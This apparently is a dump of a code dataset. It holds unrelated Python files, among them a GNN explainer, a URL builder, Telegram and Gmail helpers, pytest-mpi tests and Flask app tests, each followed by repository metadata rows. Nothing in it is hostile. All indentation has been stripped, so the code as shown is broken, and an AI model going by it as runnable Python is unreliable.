self.model.eval()
self._clear_masks()
# all nodes belong to same graph
batch = torch.zeros(x.shape[0], dtype=int, device=x.device)
# Get the initial prediction.
prediction = self.get_initial_prediction(x, edge_index, batch=batch,
**kwargs)
self._initialize_masks(x, edge_index)
self.to(x.device)
if self.allow_edge_mask:
set_masks(self.model, self.edge_mask, edge_index,
apply_sigmoid=True)
parameters = [self.node_feat_mask, self.edge_mask]
else:
parameters = [self.node_feat_mask]
optimizer = torch.optim.Adam(parameters, lr=self.lr)
if self.log: # pragma: no cover
pbar = tqdm(total=self.epochs)
pbar.set_description('Explain graph')
for epoch in range(1, self.epochs + 1):
optimizer.zero_grad()
h = x * self.node_feat_mask.sigmoid()
out = self.model(x=h, edge_index=edge_index, batch=batch, **kwargs)
loss = self.get_loss(out, prediction, None)
loss.backward()
optimizer.step()
if self.log: # pragma: no cover
pbar.update(1)
if self.log: # pragma: no cover
pbar.close()
node_feat_mask = self.node_feat_mask.detach().sigmoid().squeeze()
if self.allow_edge_mask:
edge_mask = self.edge_mask.detach().sigmoid()
else:
edge_mask = torch.ones(edge_index.size(1))
self._clear_masks()
return node_feat_mask, edge_mask
def explain_node(self, node_idx, x, edge_index, **kwargs):
r"""Learns and returns a node feature mask and an edge mask that play a
crucial role to explain the prediction made by the GNN for node
:attr:`node_idx`.
Args:
node_idx (int): The node to explain.
x (Tensor): The node feature matrix.
edge_index (LongTensor): The edge indices.
**kwargs (optional): Additional arguments passed to the GNN module.
:rtype: (:class:`Tensor`, :class:`Tensor`)
"""
self.model.eval()
self._clear_masks()
num_nodes = x.size(0)
num_edges = edge_index.size(1)
# Only operate on a k-hop subgraph around `node_idx`.
x, edge_index, mapping, hard_edge_mask, subset, kwargs = \
self.subgraph(node_idx, x, edge_index, **kwargs)
# Get the initial prediction.
prediction = self.get_initial_prediction(x, edge_index, **kwargs)
self._initialize_masks(x, edge_index)
self.to(x.device)
if self.allow_edge_mask:
set_masks(self.model, self.edge_mask, edge_index,
apply_sigmoid=True)
parameters = [self.node_feat_mask, self.edge_mask]
else:
parameters = [self.node_feat_mask]
optimizer = torch.optim.Adam(parameters, lr=self.lr)
if self.log: # pragma: no cover
pbar = tqdm(total=self.epochs)
pbar.set_description(f'Explain node {node_idx}')
for epoch in range(1, self.epochs + 1):
optimizer.zero_grad()
h = x * self.node_feat_mask.sigmoid()
out = self.model(x=h, edge_index=edge_index, **kwargs)
loss = self.get_loss(out, prediction, mapping)
loss.backward()
optimizer.step()
if self.log: # pragma: no cover
pbar.update(1)
if self.log: # pragma: no cover
pbar.close()
node_feat_mask = self.node_feat_mask.detach().sigmoid()
if self.feat_mask_type == 'individual_feature':
new_mask = x.new_zeros(num_nodes, x.size(-1))
new_mask[subset] = node_feat_mask
node_feat_mask = new_mask
elif self.feat_mask_type == 'scalar':
new_mask = x.new_zeros(num_nodes, 1)
new_mask[subset] = node_feat_mask
node_feat_mask = new_mask
node_feat_mask = node_feat_mask.squeeze()
if self.allow_edge_mask:
edge_mask = self.edge_mask.new_zeros(num_edges)
edge_mask[hard_edge_mask] = self.edge_mask.detach().sigmoid()
else:
edge_mask = torch.zeros(num_edges)
edge_mask[hard_edge_mask] = 1
self._clear_masks()
return node_feat_mask, edge_mask
def __repr__(self):
return f'{self.__class__.__name__}()'
| 39.037594
| 79
| 0.600443
| 10,184
| 0.980551
| 0
| 0
| 0
| 0
| 0
| 0
| 3,886
| 0.374158
|
af277517a9ae94e0e93ae316044261745639cbc5
| 381
|
py
|
Python
|
australia.py/real para dolar.py
|
Godofcoffe/Australia
|
9d33e5f96dac99e670887d51411476a1220e43af
|
[
"MIT"
] | null | null | null |
australia.py/real para dolar.py
|
Godofcoffe/Australia
|
9d33e5f96dac99e670887d51411476a1220e43af
|
[
"MIT"
] | null | null | null |
australia.py/real para dolar.py
|
Godofcoffe/Australia
|
9d33e5f96dac99e670887d51411476a1220e43af
|
[
"MIT"
] | null | null | null |
try:
real = float(input('R$:'))
except ValueError:
print(f'Digite uma quantia valida.')
real = float(input('R$:'))
while len(str(real)) > 5:
print('Quantia não reconhecida, digite novamente com "." para separar os centavos')
real = float(input('R$:'))
print(f'Voce pode comprar {real/5.55:.2f} dolares')
print(f'E pode comprar tambem {real/6.56:.2f} euros')
| 29.307692
| 88
| 0.650919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 212
| 0.554974
|
af2a14c5a1ecce93ffbb2b29cf3a4a7b86e5ec05
| 6,482
|
py
|
Python
|
urlazy.py
|
i-trofimtschuk/urlazy
|
bdd6b3fd817f49ec35f590a7b01bb93ce290019a
|
[
"Unlicense"
] | 1
|
2021-02-02T13:33:46.000Z
|
2021-02-02T13:33:46.000Z
|
urlazy.py
|
i-trofimtschuk/urlazy
|
bdd6b3fd817f49ec35f590a7b01bb93ce290019a
|
[
"Unlicense"
] | null | null | null |
urlazy.py
|
i-trofimtschuk/urlazy
|
bdd6b3fd817f49ec35f590a7b01bb93ce290019a
|
[
"Unlicense"
] | null | null | null |
from __future__ import annotations
from dataclasses import dataclass, field
from typing import List, Tuple, Union
from urllib.parse import ParseResult, urlencode
__version__ = '0.0.1.dev'
Query = List[Tuple[str, str]]
Path = List[str]
@dataclass()
class URL:
"""Build URLs incrementally
# one way
>>> url = HTTPS() // 'www.youtube.com'
>>> video_id = 'dQw4w9WgXcQ'
>>> tracking = {'utm_campaign': 'utmc', 'utm_source': 'utms', 'utm_medium': 'utmm'}
>>> if video_id:
... url /= 'watch'
... url &= {'v': video_id}
>>> if tracking:
... url &= tracking
>>> url.geturl()
'https://www.youtube.com/watch?v=dQw4w9WgXcQ&utm_campaign=utmc&utm_source=utms&utm_medium=utmm'
# another way
>>> url = URL().https()
>>> url.hostname('www.youtube.com')
URL(_scheme='https', _username='', _password='', _hostname='www.youtube.com', _port='', _path=[], _query=[], _fragment='')
>>> video_id = 'dQw4w9WgXcQ'
>>> tracking = {'utm_campaign': 'utmc', 'utm_source': 'utms', 'utm_medium': 'utmm'}
>>> if video_id:
... url.path('watch')
... url.query({'v': video_id})
URL(_scheme='https', _username='', _password='', _hostname='www.youtube.com', _port='', _path=['watch'], _query=[], _fragment='')
URL(_scheme='https', _username='', _password='', _hostname='www.youtube.com', _port='', _path=['watch'], _query=[('v', 'dQw4w9WgXcQ')], _fragment='')
>>> if tracking:
... url.query(tracking)
URL(_scheme='https', _username='', _password='', _hostname='www.youtube.com', _port='', _path=['watch'], _query=[('v', 'dQw4w9WgXcQ'), ('utm_campaign', 'utmc'), ('utm_source', 'utms'), ('utm_medium', 'utmm')], _fragment='')
>>> url.geturl()
'https://www.youtube.com/watch?v=dQw4w9WgXcQ&utm_campaign=utmc&utm_source=utms&utm_medium=utmm'
# other examples
>>> (HTTPS() // 'www.youtube.com' / 'watch' & {'v': 'dQw4w9WgXcQ'}).url
'https://www.youtube.com/watch?v=dQw4w9WgXcQ'
>>> (URL.https().hostname('www.youtube.com').path('watch').query({'v': 'dQw4w9WgXcQ'})).url
'https://www.youtube.com/watch?v=dQw4w9WgXcQ'
>>> (HTTPS() // URL().hostname('www.youtube.com') / URL().path('watch') & URL().query({'v': 'dQw4w9WgXcQ'}) | URL().fragment('fragment')).url
'https://www.youtube.com/watch?v=dQw4w9WgXcQ#fragment'
>>> (HTTPS() // 'www.youtube.com' / 'path1' / 'path2' / '' & [('a', 1), ('b', 2)] & [('a', 3)] | 'fragment' | '-more-fragment').url
'https://www.youtube.com/path1/path2/?a=1&b=2&a=3#fragment-more-fragment'
>>> (URL.https().username('user').password('pwd').hostname('www.youtube.com').port(443).path('/').query([('a', 1), ('b', 2)]).query([('a', 3)]).fragment('fragment').fragment('-more-fragment')).url
'https://user:pwd@www.youtube.com:443/?a=1&b=2&a=3#fragment-more-fragment'
"""
_scheme: str = ''
_username: str = ''
_password: str = ''
_hostname: str = ''
_port: str = ''
_path: Path = field(default_factory=list)
_query: Query = field(default_factory=list)
_fragment: str = ''
@staticmethod
def http() -> URL:
return URL().scheme('http')
@staticmethod
def https() -> URL:
return URL().scheme('https')
def scheme(self, scheme: str) -> URL:
self._scheme = scheme
return self
def username(self, username: str) -> URL:
self._username = username
return self
def password(self, password: str) -> URL:
self._password = password
return self
def hostname(self, hostname: str) -> URL:
self._hostname = hostname
return self
def port(self, port: Union[int, str]) -> URL:
self._port = str(port)
return self
@property
def _netloc(self) -> str:
netloc = ''
if self._username:
if self._password:
netloc += f'{self._username}:{self._password}@'
else:
netloc += f'{self._username}@'
netloc += self._hostname
if self._port:
netloc += f':{self._port}'
return netloc
def path(self, path: str) -> URL:
self._path.append(path)
return self
def query(self, query: Union[Query, dict]) -> URL:
if isinstance(query, dict):
self._query.extend(query.items())
else:
self._query.extend(query)
return self
def fragment(self, fragment: str) -> URL:
self._fragment += fragment
return self
def geturl(self) -> str:
return self.parse_result.geturl()
def __str__(self):
return self.geturl()
@property
def url(self) -> str:
return self.geturl()
@property
def parse_result(self) -> ParseResult:
return ParseResult(
scheme=self._scheme,
netloc=self._netloc,
path='/'.join(self._path),
params='',
query=urlencode(self._query),
fragment=self._fragment)
def __floordiv__(self, other: Union[URL, str]) -> URL:
if isinstance(other, URL):
self._username = other._username
self._password = other._password
self._hostname = other._hostname
self._port = other._port
else:
if '@' in other:
auth, _, host_port = other.partition('@')
if ':' in auth:
self._username, self._password = auth.split(':', 1)
else:
self._username, self._password = auth, ''
else:
host_port = other
if ':' in host_port:
self._hostname, self._port = host_port.split(':', 1)
else:
self._hostname, self._port = host_port, ''
return self
def __truediv__(self, other: Union[URL, str]) -> URL:
if isinstance(other, URL):
self._path.extend(other._path)
return self
return self.path(other)
def __and__(self, other: Union[URL, dict]) -> URL:
if isinstance(other, URL):
self._query.extend(other._query)
return self
return self.query(other)
def __or__(self, other: Union[URL, str]) -> URL:
if isinstance(other, URL):
return self.fragment(other._fragment)
return self.fragment(other)
HTTP = URL.http
HTTPS = URL.https
if __name__ == "__main__":
import doctest
doctest.testmod()
| 31.619512
| 227
| 0.568343
| 6,123
| 0.944616
| 0
| 0
| 6,136
| 0.946621
| 0
| 0
| 2,739
| 0.422555
|
af2bf330f5c58cef255d60fd7059e9b558223019
| 552
|
py
|
Python
|
services/web/freq_demo/admin.py
|
mnesvold/freq
|
27fb15a825e44458c776f4135abf516e751b3fb8
|
[
"MIT"
] | null | null | null |
services/web/freq_demo/admin.py
|
mnesvold/freq
|
27fb15a825e44458c776f4135abf516e751b3fb8
|
[
"MIT"
] | null | null | null |
services/web/freq_demo/admin.py
|
mnesvold/freq
|
27fb15a825e44458c776f4135abf516e751b3fb8
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.contrib.auth.forms import AuthenticationForm
def customize_admin():
admin.site.site_header = 'Feature Request Tracker'
admin.site.site_title = 'Freq'
admin.site.index_title = 'Track Feature Requests with Freq'
admin.site.site_url = None
# allow non-staff users to access admin views
def is_user_active(request):
return request.user.is_active
admin.site.has_permission = is_user_active
# allow non-staff users to log in
admin.site.login_form = AuthenticationForm
| 32.470588
| 63
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 143
| 0.259058
|
af2ded2bcaaf00693925512eeea11c00ded8df3d
| 3,842
|
py
|
Python
|
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
import logging
from dataclasses import dataclass
import TelegramBot.lib_requests as lib_requests
import CustomLogger
@dataclass
class MessageData:
last_message: str
chatroom_id: str
sender_id: str
sender_name: str
@property
def command(self):
if not self.last_message[:1] == "/":
return
if "@" in self.last_message:
return self.last_message.split("@")[0]
elif " " in self.last_message:
return self.last_message.split(" ")[0]
else:
return self.last_message
class TelegramError(Exception):
def __init__(self, text: str, chatroom_id: str = 0):
self.text = text,
self.chatroom_id = chatroom_id
class TelegramBot:
def __init__(self, bot_token: str,
logger: logging.Logger = None):
"""
:param bot_token:
:param logger:
"""
self.bot_token = bot_token
self.url = "https://api.telegram.org/bot" + self.bot_token
self.update_id = 0
self.logger = logger if logger else CustomLogger.getLogger()
def request_bot_info(self) -> dict:
"""Request Bot Info"""
result = lib_requests.http_request(self.url + "/getMe")
if not result["result"]["username"]:
raise TelegramError('Missing data result["result"]["username"]')
self.logger.debug(f"Request Bot Info: {result}")
return result["result"]["username"]
def send_text(self, message: str, chatroom_id: str) -> None:
"""Send Text Message"""
params = {"chat_id": chatroom_id, "text": message}
result = lib_requests.http_request(self.url + "/sendMessage", params)
if not result["ok"]:
raise TelegramError(f"Error sending Text Message: {message} to Chatroom{chatroom_id}")
self.logger.debug(f"Send Text Message: {message} to Chatroom {chatroom_id}")
def send_photo(self, file: bytes, chatroom_id: str) -> None:
if not file:
raise TelegramError(f"Got not bytes Object to send a photo.")
# send file to chat
params = {"chat_id": chatroom_id}
payload = {"photo": file}
result = lib_requests.http_request(self.url + "/sendPhoto", params, payload)
if not result["ok"]:
self.send_text(result["description"], chatroom_id)
raise TelegramError(f"Error sending Photo to Chatroom: {chatroom_id} Response: {result}")
self.logger.debug(f"Send Photo to chat: {chatroom_id}")
def request_message(self) -> MessageData:
"""
Request Last messages.
:return:
"""
params = {"offset": self.update_id + 1}
response = lib_requests.http_request(self.url + "/getUpdates", params)
if not response["ok"]:
raise TelegramError(f"Failure in Response: {response}")
if len(response["result"]) == 0:
return
# store messages to list of MessageData
message = response["result"][0]
self.logger.debug(f"Got message: {message}")
# store last update ID for requesting just newer Messages
self.update_id = message["update_id"]
if "message" not in message.keys():
raise TelegramError(f"Not a Text Message {message}", chatroom_id=message["message"]["chat"]["id"])
if "text" not in message["message"].keys():
raise TelegramError(f"Not a Text Message {message}", chatroom_id=message["message"]["chat"]["id"])
return MessageData(last_message=str(message["message"]["text"]),
chatroom_id=str(message["message"]["chat"]["id"]),
sender_id=str(message["message"]["from"]["id"]),
sender_name=str(message["message"]["from"]["first_name"])
)
| 35.574074
| 110
| 0.60151
| 3,703
| 0.963821
| 0
| 0
| 443
| 0.115305
| 0
| 0
| 1,108
| 0.288391
|
af2f99ce0b83f78345650ccae1cccf6756b809c0
| 555
|
py
|
Python
|
test.py
|
BLovegrove/CPR-Tools
|
0dda4409410c5b2c47a913ac611e53870ef33cf7
|
[
"Apache-2.0"
] | 2
|
2022-01-30T07:29:04.000Z
|
2022-01-31T02:42:37.000Z
|
test.py
|
BLovegrove/cpr-tools
|
0dda4409410c5b2c47a913ac611e53870ef33cf7
|
[
"Apache-2.0"
] | 1
|
2022-02-13T21:46:44.000Z
|
2022-02-14T20:38:31.000Z
|
test.py
|
BLovegrove/cpr-tools
|
0dda4409410c5b2c47a913ac611e53870ef33cf7
|
[
"Apache-2.0"
] | null | null | null |
import pyautogui as pgui
pgui.PAUSE = 0
def apply_sauce():
sauce_pos = (365, 548)
pizza_pos = (968, 638)
pgui.moveTo(sauce_pos[0], sauce_pos[1])
# pgui.mouseDown()
print("mouse down")
pgui.moveTo(pizza_pos[0], pizza_pos[1])
speed = 0.11
drift = 50
for i in range(3):
pgui.moveTo(pizza_pos[0] - (i * drift), pizza_pos[1] + 230, speed)
pgui.moveTo(pizza_pos[0] - (i * drift), pizza_pos[1], speed)
# pgui.mouseUp()
print("mouse up")
return
apply_sauce()
| 20.555556
| 74
| 0.565766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 56
| 0.100901
|
af2fe4de9eede3a49c06c050ed3b255d1c2f19b7
| 2,275
|
py
|
Python
|
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Notifies subscribers of new articles."""
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class Email:
"""Formats email content as a MIME message."""
def __init__(self, sender, receiver, subject, content, use_html=False):
self.sender = str(sender)
self.receiver = receiver
self.subject = subject
self.content = content
if use_html:
self.email = MIMEMultipart("alternative")
else:
self.email = MIMEMultipart()
self.email["Subject"] = self.subject
self.email["From"] = self.sender
self.email["To"] = self.receiver
if use_html:
body = MIMEText(content, "html")
else:
body = MIMEText(content, "plain")
self.email.attach(body)
def __repr__(self):
"""Converts MIME email to sendable format."""
return self.email.as_string()
def change_receiver(self, receiver):
"""Modify email recipient so we can resend to additional users."""
self.receiver = receiver
self.email["To"] = self.receiver
return
class GmailSender:
"""Sends email through Gmail account."""
def __init__(self, user, pwd):
self.user = user
self.server = smtplib.SMTP("smtp.gmail.com:587")
self.server.starttls()
self.server.login(self.user, pwd)
def send_email(self, email):
self.server.sendmail(str(email.sender),
str(email.receiver),
str(email))
return
def __repr__(self):
return self.user
def __del__(self):
return self.server.quit()
class Notifier:
"""Notifies subscribers of content through GmailSender."""
def __init__(self, subscribers, user, pwd):
self.user = user
self.sender = GmailSender(user, pwd)
self.subscribers = subscribers
def mail_subscribers(self, email):
for subscriber in self.subscribers:
email.change_receiver(subscriber)
self.sender.send_email(email)
return
def __repr__(self):
return repr(self.sender)
def main():
return
if __name__ == "__main__":
main()
| 27.409639
| 75
| 0.607473
| 2,037
| 0.895385
| 0
| 0
| 0
| 0
| 0
| 0
| 398
| 0.174945
|
af304f834ba45b345b4105da4802d1c8a9c5c35b
| 296
|
py
|
Python
|
project/common/regular.py
|
mizxc/kispower
|
38d88c4c5a983a90009cb8c7012cb4295b1aec06
|
[
"MIT"
] | 12
|
2020-03-12T08:13:52.000Z
|
2022-01-19T05:27:35.000Z
|
project/common/regular.py
|
kqqian/kispower
|
38d88c4c5a983a90009cb8c7012cb4295b1aec06
|
[
"MIT"
] | 4
|
2020-07-18T05:07:52.000Z
|
2022-01-13T02:21:58.000Z
|
project/common/regular.py
|
kqqian/kispower
|
38d88c4c5a983a90009cb8c7012cb4295b1aec06
|
[
"MIT"
] | 3
|
2020-04-30T02:49:25.000Z
|
2022-01-19T05:27:38.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2019-12-22
# @Author : mizxc
# @Email : xiangxianjiao@163.com
import re
def reEmail(str):
return re.match(r'^[0-9a-zA-Z_]{0,19}@[0-9a-zA-Z]{1,13}\.[com,cn,net]{1,3}$', str)
if __name__ == '__main__':
print (reEmail(''))
print (len('12222'))
| 21.142857
| 86
| 0.564189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 177
| 0.597973
|
af3189d1de387336103e54ce753d23af15e912bb
| 2,615
|
py
|
Python
|
tests/test_markers.py
|
opoplawski/pytest-mpi
|
9ad369af744a47cedf5025245f051e793703c748
|
[
"BSD-3-Clause"
] | 9
|
2019-07-12T11:31:29.000Z
|
2022-03-11T19:31:17.000Z
|
tests/test_markers.py
|
opoplawski/pytest-mpi
|
9ad369af744a47cedf5025245f051e793703c748
|
[
"BSD-3-Clause"
] | 38
|
2019-12-18T05:08:39.000Z
|
2022-03-25T02:45:00.000Z
|
tests/test_markers.py
|
opoplawski/pytest-mpi
|
9ad369af744a47cedf5025245f051e793703c748
|
[
"BSD-3-Clause"
] | 6
|
2020-05-10T23:37:19.000Z
|
2022-03-21T13:34:22.000Z
|
from pytest_mpi._helpers import _fix_plural
MPI_TEST_CODE = """
import pytest
@pytest.mark.mpi
def test_size():
from mpi4py import MPI
comm = MPI.COMM_WORLD
assert comm.size > 0
@pytest.mark.mpi(min_size=2)
def test_size_min_2():
from mpi4py import MPI
comm = MPI.COMM_WORLD
assert comm.size >= 2
@pytest.mark.mpi(min_size=4)
def test_size_min_4():
from mpi4py import MPI
comm = MPI.COMM_WORLD
assert comm.size >= 4
@pytest.mark.mpi(2)
def test_size_fail_pos():
from mpi4py import MPI
comm = MPI.COMM_WORLD
assert comm.size > 0
def test_no_mpi():
assert True
"""
MPI_SKIP_TEST_CODE = """
import pytest
@pytest.mark.mpi_skip
def test_skip():
assert True
"""
MPI_XFAIL_TEST_CODE = """
import pytest
@pytest.mark.mpi_xfail
def test_xfail():
try:
from mpi4py import MPI
comm = MPI.COMM_WORLD
assert comm.size < 2
except ImportError:
assert True
"""
def test_mpi(testdir):
testdir.makepyfile(MPI_TEST_CODE)
result = testdir.runpytest()
result.assert_outcomes(skipped=4, passed=1)
def test_mpi_with_mpi(mpi_testdir, has_mpi4py):
mpi_testdir.makepyfile(MPI_TEST_CODE)
result = mpi_testdir.runpytest("--with-mpi")
if has_mpi4py:
result.assert_outcomes(**_fix_plural(passed=3, errors=1, skipped=1))
else:
result.assert_outcomes(**_fix_plural(passed=1, errors=4))
def test_mpi_only_mpi(mpi_testdir, has_mpi4py):
mpi_testdir.makepyfile(MPI_TEST_CODE)
result = mpi_testdir.runpytest("--only-mpi")
if has_mpi4py:
result.assert_outcomes(**_fix_plural(passed=2, errors=1, skipped=2))
else:
result.assert_outcomes(**_fix_plural(errors=4, skipped=1))
def test_mpi_skip(testdir):
testdir.makepyfile(MPI_SKIP_TEST_CODE)
result = testdir.runpytest()
result.assert_outcomes(passed=1)
def test_mpi_skip_under_mpi(mpi_testdir):
mpi_testdir.makepyfile(MPI_SKIP_TEST_CODE)
result = mpi_testdir.runpytest("--with-mpi")
result.assert_outcomes(skipped=1)
def test_mpi_xfail(testdir):
testdir.makepyfile(MPI_XFAIL_TEST_CODE)
result = testdir.runpytest()
result.assert_outcomes(passed=1)
def test_mpi_xfail_under_mpi(mpi_testdir, has_mpi4py):
mpi_testdir.makepyfile(MPI_XFAIL_TEST_CODE)
result = mpi_testdir.runpytest("--with-mpi")
if has_mpi4py:
result.assert_outcomes(xfailed=1)
else:
result.assert_outcomes(xpassed=1)
| 21.61157
| 76
| 0.669981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,038
| 0.396941
|
af33d38936d36aba5ecfba4eb2562457febb889c
| 673
|
py
|
Python
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 18
|
2021-05-04T15:26:59.000Z
|
2022-01-04T17:17:23.000Z
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 3
|
2020-11-07T14:45:28.000Z
|
2021-05-05T17:04:22.000Z
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 2
|
2021-05-04T15:54:31.000Z
|
2021-05-05T00:15:20.000Z
|
import asyncio
import discord
import nest_asyncio
from repalette.constants import DISCORD_BOT_TOKEN
async def __notify_discord(channel_id, message):
client = discord.Client()
async def __send_message():
await client.wait_until_ready()
await client.get_channel(channel_id).send(message)
await client.close()
client.loop.create_task(__send_message())
await client.start(DISCORD_BOT_TOKEN)
def notify_discord(channel_id, message):
nest_asyncio.apply()
loop = asyncio.get_event_loop()
loop.run_until_complete(
__notify_discord(
channel_id=channel_id,
message=message,
)
)
| 21.709677
| 58
| 0.702823
| 0
| 0
| 0
| 0
| 0
| 0
| 328
| 0.48737
| 0
| 0
|
af34c785490cf98dfc2a7f4269f8b57f92aab889
| 4,404
|
py
|
Python
|
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | 79
|
2020-10-06T08:34:44.000Z
|
2020-12-12T17:28:53.000Z
|
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | null | null | null |
import logging
import pytest
from werkzeug.datastructures import ImmutableMultiDict
from main import app
@pytest.fixture
def test_client():
app.config["TESTING"] = True
return app.test_client()
def test_GET_index(test_client):
response = test_client.get("/")
assert response.status_code == 200
assert b"Registration of equipment and books." in response.data
assert b"Enter one of the following keywords" in response.data
def test_GET_search_with_correct_query(test_client):
response = test_client.get("/search?query=kindle")
assert b"Search results for kindle" in response.data
def test_GET_search_with_incorrect_query(test_client):
response = test_client.get("/search?unexpected_query=kindle", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_search_with_not_inputted_query(test_client):
response = test_client.get("/search?query=", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_search_direct_access(test_client):
response = test_client.get("/search", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_registration_direct_access(test_client):
response = test_client.get("/registration", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_POST_registration_success(test_client):
test_client.get("/search?query=UNIX")
response = test_client.post("/registration", data={"asin": "4274064069"})
assert "Registration for details of UNIXという考え方―その設計思想と哲学" in response.data.decode("UTF-8")
def test_POST_registration_failure(test_client):
response = test_client.post("/registration", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Please try the procedure again from the beginning, sorry for the inconvenience." in response.data
def test_POST_registration_contributors(test_client):
test_client.get("/search?query=DeepLearning")
response = test_client.post("/registration", data={"asin": "4873117585"})
assert "ゼロから作るDeep Learning ―Pythonで学ぶディープラーニングの理論と実装" in response.data.decode("UTF-8")
assert "斎藤 康毅" in response.data.decode("UTF-8")
def test_POST_registration_publication_date_parse_failed(test_client, caplog):
test_client.get("/search?query=UNIX")
with test_client.session_transaction() as _session:
for product in _session["product_list"]:
product.info.publication_date = "unsupported format"
test_client.post("/registration", data={"asin": "4274064069"})
assert ("__init__", logging.ERROR,
"registration: Parse failed. Unknown string format: unsupported format") in caplog.record_tuples
def test_POST_register_airtable_success(test_client):
imd = ImmutableMultiDict(
[
("image_url", "https://m.media-amazon.com/images/I/210tcugW9ML.jpg"),
("title", "テンマクデザイン サーカス TC DX"),
("url", "https://www.amazon.co.jp/dp/B07XB5WX89?tag=bellonieslog-22&linkCode=osi&th=1&psc=1"),
("asin", "B07XB5WX89"),
("manufacturer", "テンマクデザイン"),
("contributors", None),
("publication_date", None),
("product_group", "Sports"),
("registrants_name", "yusuke-sforzando"),
("default_positions", "sforzando-kawasaki"),
("current_positions", "sforzando-kawasaki"),
("note", ""),
("features", "['サーカスTC DX\\u3000サンドカラー', '【サーカスTCと共通 ●設営が簡単に出来るセットアップガイド付。']")
]
)
test_client.get("/search?query=サーカスTC")
test_client.post("/registration", data={"asin": "B07XB5WX89"})
response = test_client.post("/register_airtable", data=imd, follow_redirects=True)
assert b"Registration completed!" in response.data
def test_POST_register_airtable_failure(test_client):
test_client.get("/search?query=サーカスTC")
test_client.post("/registration", data={"asin": "B07XB5WX89"})
response = test_client.post("/register_airtable", data={}, follow_redirects=True)
assert b"Registration failed." in response.data
| 40.036364
| 110
| 0.719573
| 0
| 0
| 0
| 0
| 96
| 0.020743
| 0
| 0
| 1,896
| 0.40968
|
af35346b37ed36d8f98147a976a6e4de22d8db47
| 849
|
py
|
Python
|
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | null | null | null |
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | null | null | null |
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | 1
|
2019-12-04T08:23:33.000Z
|
2019-12-04T08:23:33.000Z
|
f1 = open("../train_pre_1")
f2 = open("../test_pre_1")
out1 = open("../train_pre_1b","w")
out2 = open("../test_pre_1b","w")
t = open("../train_gbdt_out")
v = open("../test_gbdt_out")
add = []
for i in range(30,49):
add.append("C" + str(i))
line = f1.readline()
print(line[:-1] + "," + ",".join(add), file=out1)
line = f2.readline()
print(line[:-1] + "," + ",".join(add), file=out2)
for i in range(40428967):
line = f1.readline()[:-1]
a = t.readline()[:-1]
ll = a.split(" ")[1:]
for j in range(19):
line += "," + add[j] + "_" + ll[j]
print(line, file=out1)
for i in range(4577464):
line = f2.readline()[:-1]
a = v.readline()[:-1]
ll = a.split(" ")[1:]
for j in range(19):
line += "," + add[j] + "_" + ll[j]
print(line, file=out2)
f1.close()
f2.close()
out1.close()
out2.close()
t.close()
v.close()
| 23.583333
| 50
| 0.537102
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 140
| 0.1649
|
af39c62b461abaa60323cf851d4989edf2ec5def
| 851
|
py
|
Python
|
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | null | null | null |
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | null | null | null |
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | 1
|
2020-05-29T01:37:42.000Z
|
2020-05-29T01:37:42.000Z
|
from PPO import *
from TD3 import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--policy_path", required=True, type=str)
